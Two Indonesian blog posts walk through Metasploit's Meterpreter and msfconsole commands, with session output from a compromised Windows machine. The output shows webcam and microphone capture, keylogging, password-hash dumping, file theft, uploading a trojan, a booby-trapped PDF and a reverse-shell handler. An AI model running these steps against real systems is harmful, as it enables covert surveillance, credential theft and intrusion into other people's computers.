Minggu, Agustus 20, 2017

 Perintah - Perintah dasar Meterpreter Metasploit


 Perintah - Perintah dasar Meterpreter Metasploit

Pada postingan kali ini saya akan membagikan beberapa perintah-perintah yang dapat dijalankan ketika kita sudah mendapatkan sesi meterpreter dari target yang kita exploit.
Kebetulan kemarin ada yang bertanya juga apa yang bisa kita lakukan jika sudah mendapat sesi meterpreter, jika kita tau perintah-perintahnya banyak yang bisa dilakukan, seperti menjalankan program yang ada di sistem target, mengirim file atau mengambil file-file yang ada di sistem target. nah di bawah ini akan saya berikan beberapa contoh perintah - perintah dasar meterpreter di metasploit

help
Perintah ini digunakan untuk melihat semua menu meterpreter

meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter scriptbackground
Perintah ini digunakan untuk mengirimkan sesi meterpreter berjalan sebagai background
meterpreter > background [*] Backgrounding session 1... msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter >

sysinfo
Perintah ini digunakan untuk melihat informasi sistem target

meterpreter > sysinfo Computer : SAMSUNG OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 4 Meterpreter : x86/win32

run vnc

Perintah ini digunakan untuk remote sistem target

meterpreter > run vnc [*] Creating a VNC reverse tcp stager: LHOST=192.168.1.100 LPORT=4545 [*] Running payload handler [*] VNC stager executable 73802 bytes long [*] Uploaded the VNC agent to C:\Users\Samsung\AppData\Local\Temp\sccHTQrAIy.exe (must be deleted manually) [*] Executing the VNC agent with endpoint 192.168.1.100:4545...


webcam_list
Perintah ini digunakan untuk melihat list webcam yang ada

meterpreter > webcam_list 1: ManyCam Virtual Webcam 2: HP Webcam-50 meterpreter > webcam_snap
Perintah ini digunakan untuk mengambil gambar dari webcam

meterpreter > webcam_snap [*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/PZegxMLF.jpeg meterpreter >

webcam_stream

Perintah ini digunakan untuk streaming secara langsung dari webcam target

meterpreter > webcam_stream [*] Starting... [*] Preparing player... [*] Opening player at: GHqixCls.html [*] Streaming... record_mic
Perintah ini digunkan untuk mengambil rekaman suara dari microphone target, tambahkan opsi -d utuk menentukan interfal

meterpreter > record_mic -d 10 [*] Starting... [*] Stopped Audio saved to: /root/UqxrMpys.wav meterpreter >

run keylogrecorder

Perintah ini digunakan untuk merekam aktifitas keyboard pada sistem target, tekan Ctrl+C untuke berhenti

meterpreter > run keylogrecorder [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.1.103_20160229.0841.txt [*] Recording ^C[*] Saving last few keystrokes [*] Interrupt [*] Stopping keystroke sniffer... meterpreter >

geteuid
perintah ini digunakan untuk melihat user server yang sedang berjalan
meterpreter > getuid Server username: Samsung\Samsung meterpreter > getsid
Perintah ini digunakan untuk mendapatkan SID dari user server yang sedang berjalan

meterpreter > getsid Server SID: S-1-5-21-341670393-1752858153-726497755-1000 meterpreter >

Search

Perintah untuk mencari sebuah file yang ada di sistem target, gunakan opsi -f untuk mencari file dengan format tertentu

meterpreter > search -f .pdf Found 50 results... C:\Users\Samsung\Documents\CV.PDF (136731 bytes) C:\Users\Samsung\DocumentsHowTo.pdf (570012 bytes) C:\Users\Samsung\Documents\pertemuan-04-klasifikasi-jaringan-komputer-compatibility-mode.pdf (149072 bytes) C:\Users\Samsung\Documents\TUTORIAL VERIFIKASI PIN ADSENSE.pdf (1170899 bytes)

'pwd' dan 'cd'

pwd digunakan untuk melihat dimana letak kita berada di direktory target, dan cd untuk masuk ke sebuah direktory

meterpreter > pwd C:\ meterpreter > cd Users meterpreter > pwd C:\Users meterpreter > ls 
Sama dengan perintah pada terminal linux, ini digunakan untuk melihat list dari suatu direktory
meterpreter > ls Listing: C:\Users\Samsung\Documents ====================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2016-02-09 17:41:36 +0700 Bluetooth Folder 100666/rw-rw-rw- 136731 fil 2015-11-24 03:55:43 +0700 CV.PDF 100666/rw-rw-rw- 1992 fil 2016-02-03 17:26:41 +0700 Default.rdp 100666/rw-rw-rw- 73216 fil 2016-01-16 17:22:29 +0700 Drawing1 FLOW EGA.vsd 100666/rw-rw-rw- 570012 fil 2015-12-02 17:39:08 +0700 HowTo.pdf 100666/rw-rw-rw- 1170899 fil 2015-12-14 19:50:58 +0700 TUTORIAL VERIFIKASI PIN ADSENSE.pdf 100666/rw-rw-rw- 8251365 fil 2015-11-23 14:11:54 +0700 Untitled.pdf 40777/rwxrwxrwx 0 dir 2015-11-23 11:09:39 +0700 penggajian_Taruna_Karya 100666/rw-rw-rw- 149072 fil 2015-12-06 21:53:04 +0700 pertemuan-04-klasifikasi-jaringan-komputer-compatibility-mode.pdf 100666/rw-rw-rw- 20505 fil 2016-01-12 14:56:55 +0700 recruitingindo511.docx meterpreter > download
Perintah ini digunakan untuk mengambil file dari sistem target

meterpreter > download Default.rdp /root/Desktop/ [*] downloading: Default.rdp -> /root/Desktop/Default.rdp [*] download : Default.rdp -> /root/Desktop/Default.rdp meterpreter >

/root/Desktop merupakan letak dimana file akan disimpan

upload

Perintah ini digunakan untuk mengirim sebuah file ke sistem target, dengan direktory yang ditetukan

meterpreter > upload trojan.exe c:\\windows\\system32 [*] uploading : trojan.exe -> c:\windows\system32 [*] uploaded : trojan.exe -> c:\windows\system32\trojan.exe meterpreter > 

cat
Sama seperti perintah umumnya pada linux, ini digunakan untuk menampilkan isi dari sebuah file 
meterpreter > cat Usage: cat file meterpreter > cat Anherr.txt Perintah Perintah dasar Meterpreter by Anherr Blog's meterpreter > mkdir

Perintah ini digunakan untuk membuat sebuah folder

meterpreter > mkdir Anherr Creating directory: Anherr meterpreter >  

Kita juga dapat menggunkan peritah 
cp untuk mengcopy file
rm untuk menghapus file
rmdir untuk menghapus suatu direktory 

ipconfig
Perintah ini digunakan untuk meliha ip target secara keseluruhan

meterpreter > ipconfig Interface 1 ============ Name : Software Loopback Interface 1 Hardware MAC : 00:00:00:00:00:00 MTU : 4294967295 IPv4 Address : 127.0.0.1 IPv4 Netmask : 255.0.0.0 IPv6 Address : ::1 IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Interface 11 ============ Name : Qualcomm Atheros AR9485 802.11b/g/n WiFi Adapter Hardware MAC : 55:7d:68:15:dd:ef MTU : 1500 IPv4 Address : 192.168.1.103 IPv4 Netmask : 255.255.255.0 IPv6 Address : fe80::cdb0:307a:4cdc:71e4 IPv6 Netmask : ffff:ffff:ffff:ffff::

netstat

Perintah ini digunakan untuk menampilkan koneklsi jaringan pada sistem target

meterpreter > netstat Connection list =============== Proto Local address Remote address State User Inode PID/Program name ----- ------------- -------------- ----- ---- ----- ---------------- tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 808/svchost.exe tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System tcp 0.0.0.0:49152 0.0.0.0:* LISTEN 0 0 480/wininit.exe tcp 0.0.0.0:49153 0.0.0.0:* LISTEN 0 0 904/svchost.exe tcp 0.0.0.0:49154 0.0.0.0:* LISTEN 0 0 984/svchost.exe tcp 0.0.0.0:49155 0.0.0.0:* LISTEN 0 0 608/services.exeps
Perintah ini digunakan untuk meliha list prosses yang sedang berjalan pada target

meterpreter > ps Process list ============ PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 0 [System Process] 4 System 276 smss.exe 376 Ath_CoexAgent.exe 2968 taskhost.exe x86 1 Samsung\Samsung C:\Windows\system32\taskhost.exe 2976 dwm.exe x86 1 Samsung\Samsung C:\Windows\system32\Dwm.exe 3024 explorer.exe x86 1 Samsung\Samsung C:\Windows\Explorer.EXE

migrate

Perintah ini digunakan untuk berpindah ke prosses yang lain

meterpreter > migrate 3024 [*] Migrating from 1192 to 3024... [*] Migration completed successfully. meterpreter >

execute

Perintah untuk mengeksekusi, contoh untuk menjalankan cmd.exe

meterpreter > execute -f cmd.exe Process 316 created. meterpreter >

shell

Perintah ini digunakan untuk mendapatkan shell dari sistem target, layaknya Command Prompt

meterpreter > shell Process 3456 created. Channel 3 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>

hashdump

Perintah ini digunakan untuk dump database SAM

meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\>

Itulah beberapa contoh dari perintah-perintah meterpreter di metasploit, sebetulnya masih ada lagi namun akan banyak jika ditulis semua, hehe , silahkan ketik help pada meterpreter untuk melihat semua list yang ada
Cukup itu dulu yang dapat saya bagikan kali ini , semoga bermanfaat

sumber www.offensive-security.com

...

 Perintah - Perintah dasar Metasploit (msfconsole)

 Perintah - Perintah dasar Metasploit (msfconsole)

Setelah sebelumnya saya share tentang Perintah - Perintah dasar Meterpreter sekarang saya akan bagikan Perintah - Perintah dasar Metasploit (msfconsole). kebalik ya hehe, harusnya msfconsole dulu baru meterpreter, tapi gpp deh yang penting tetep sharing :D.

Oke, di bawah ini merupakan beberapa perintah dari msfconsole yang dapat digunakan

msfconsole
Perintah untuk memulai menjalankan msfconsole

banner

Perintah ini digunakan untuk memilih secara acak logo metasploit yang akan di tampilkan

msf > banner MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM# JMMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm `?MMM MMMM` dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM http://metasploit.pro Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro Learn more on http://rapid7.com/metasploit =[ metasploit v4.11.4-2015071403 ] + -- --=[ 1467 exploits - 840 auxiliary - 232 post ] + -- --=[ 432 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >

db_status
Perintah ini digunakan untuk mengecek koneksi database postgresql

msf > db_status [*] postgresql connected to msf msf >

show exploit
Perintah ini digunakan untuk melihat semua exploit yang ada di metasploit

msf > show exploits Exploits ======== Name Disclosure Date Rank Description ---- --------------- ---- ----------- aix/local/ibstat_path 2013-09-24 excellent ibstat $PATH Privilege Escalation aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)

show payloads
Perintah ini digunakan untuk melihat semua payload yang ada

msf > show payloads Payloads ======== Name Disclosure Date Rank Description ---- --------------- ---- ----------- aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline aix/ppc/shell_interact normal AIX execve Shell for inetd aix/ppc/shell_reverse_tcp normal AIX Command Shell, Reverse TCP Inline

show auxiliary
Perintah ini digunakan untuk menampilkan semua module auxiliary

msf > show auxiliary Auxiliary ========= Name Disclosure Date Rank Description ---- --------------- ---- ----------- admin/2wire/xslt_password_reset 2007-08-15 normal 2Wire Cross-Site Request Forgery Password Reset Vulnerability admin/android/google_play_store_uxss_xframe_rce normal Android Browser RCE Through Google Play Store XFO admin/appletv/appletv_display_image normal Apple TV Image Remote Control admin/appletv/appletv_display_video normal Apple TV Video Remote Control

search name
Perintah ini digunakan untuk mencari sebuah exploit atau module yang disebutkan

msf > search pdf_embedded Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent Adobe PDF Embedded EXE Social Engineering exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent Adobe PDF Escape EXE Social Engineering (No JavaScript) msf >

use
Perintah ini digunakan untuk menentukan module exploit yang akan digunakan

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe msf exploit(adobe_pdf_embedded_exe) >

set payload

Perintah ini untuk menentukan payload yang akan digunakan

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(adobe_pdf_embedded_exe) >

show targets
Perintah ini digunakan untuk melihat platform target yang dapat diserang dengan exploit yang digunakan

msf exploit(adobe_pdf_embedded_exe) > show targets Exploit targets: Id Name -- ---- 0 Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English) msf exploit(adobe_pdf_embedded_exe) >

show options

Perintah ini digunakan melihat pilihan yang tersedia untuk module atau exploit

msf exploit(adobe_pdf_embedded_exe_nojs) > show options Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs): Name Current Setting Required Description ---- --------------- -------- ----------- EXENAME msf.exe no The Name of payload exe. FILENAME evil.pdf no The output filename. LAUNCH_MESSAGE To view the encrypted content please tick the "Do not show this message again" box and press Open. no The message to display in the File: area Exploit target: Id Name -- ---- 0 Adobe Reader <= v9.3.3 (Windows XP SP3 English) msf exploit(adobe_pdf_embedded_exe_nojs) >

back
Perintah ini digunakan untuk kembali dari konteks saat ini

msf exploit(adobe_pdf_embedded_exe) > back msf >

set LHOST

Perintah ini digunakan untuk mengatur IP Attacker, bisa menggunakan IP Lokal atau IP Publik (tergantung kondisi )

msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.1.100 lhost => 192.168.1.100 msf exploit(adobe_pdf_embedded_exe) >

set LPORT

Perintah ini digunakan untuk mengatur port lintener

msf exploit(adobe_pdf_embedded_exe) > set LPORT 443 LPORT => 443 msf exploit(adobe_pdf_embedded_exe) >

set RHOST
Perintah ini digunakan untuk menentukan IP Target, (biasa digunakan untuk jenis exploit tertentu)

msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.1.103 RHOST => 192.168.1.103

unset

Kebalikan dari set perintah ini digunakan untuk membatalkan atau menghapus parameter yang sebelumnya di atur, kita juga dapat menghapus semua variabel dengan perintah 'unset all'

msf exploit(handler) > unset payload android/meterpreter/reverse_tcp Unsetting payload... Unsetting android/meterpreter/reverse_tcp... msf exploit(handler) > unset all Flushing datastore... msf exploit(handler) >

save
Kita juga dapat menyimpan semua setting yang telah di tetapkan,dan semua akan dimuat ketika startup(saat msfconsole di buka) tanpa mengetur semuanya lagi dari awal.
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.100 lhost => 192.168.1.100 msf exploit(handler) > set lport 443 lport => 443 msf exploit(handler) > save Saved configuration to: /root/.msf4/config msf exploit(handler) > exploit
Perintah ini digunakan mengeksekusi module exploit dan menyerang target

msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.100:443 [*] Starting the payload handler...

exploit -j

Perintah ini digunakan mengeksekusi module exploit dan menyerang target sekaligus bejalan sebagai background

msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.100:443 [*] Starting the payload handler... msf exploit(handler) >

exploit -z

Hampir sama dengan exploit -j, ini tidak berinteraksi dengan sesi meterpreter ketika exploitasi suskses(otomatis bejalan sebagai background jika exploitasi sukses)

msf exploit(handler) > exploit -z [*] Started reverse handler on 192.168.1.100:443 [*] Starting the payload handler... [*] Sending stage (885806 bytes) to 192.168.1.103 [*] Meterpreter session 2 opened (192.168.1.100:443 -> 192.168.1.103:49272) at 2016-03-02 00:26:39 +0700 [*] Session 1 created in the background. msf exploit(handler) >

sessions -l

Perintah ini digunakan untuk melihat list sesi meterpreter yang sedang aktif (berjalan sebagai background)

msf exploit(handler) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 2 meterpreter x86/win32 SAMSUNG\SAMSUNG @ SAMSUNG 192.168.1.100:443 -> 192.168.1.103:49207 (192.168.1.103) msf exploit(handler) >

sessions -i ID

Perintah ini digunakan untuk berinteraksi kembali dengan sesi meterpreter yang sedang berjalan sebagai background

msf exploit(handler) > sessions -i 2 [*] Starting interaction with 2... meterpreter >

sessions -K

Perintah ini digunakan untuk mematikan semua sesi meterpreter yang sedang aktif

msf exploit(handler) > sessions -K [*] Killing all sessions... [*] 192.168.1.103 - Meterpreter session 2 closed. msf exploit(handler) >

help
Perintah ini digunakan untuk melihat perintah-perintah dan deskripsi yang dapat digunakan pada msfconsole

msf > help Core Commands ============= Command Description ------- ----------- ? Help menu back Move back from the current context banner Display an awesome metasploit banner cd Change the current working directory color Toggle color connect Communicate with a host edit Edit the current module with $VISUAL or $EDITOR exit Exit the console get Gets the value of a context-specific variable getg Gets the value of a global variable go_pro Launch Metasploit web GUI grep Grep the output of another command help Help menu

Itulah beberapa contoh Perintah - Perintah dasar dari msfconsole, mohon maaf apabila ada bebrapa perintah yang masih kurang. semoga bermanfaat.

sumber https://www.offensive-security.com
....
...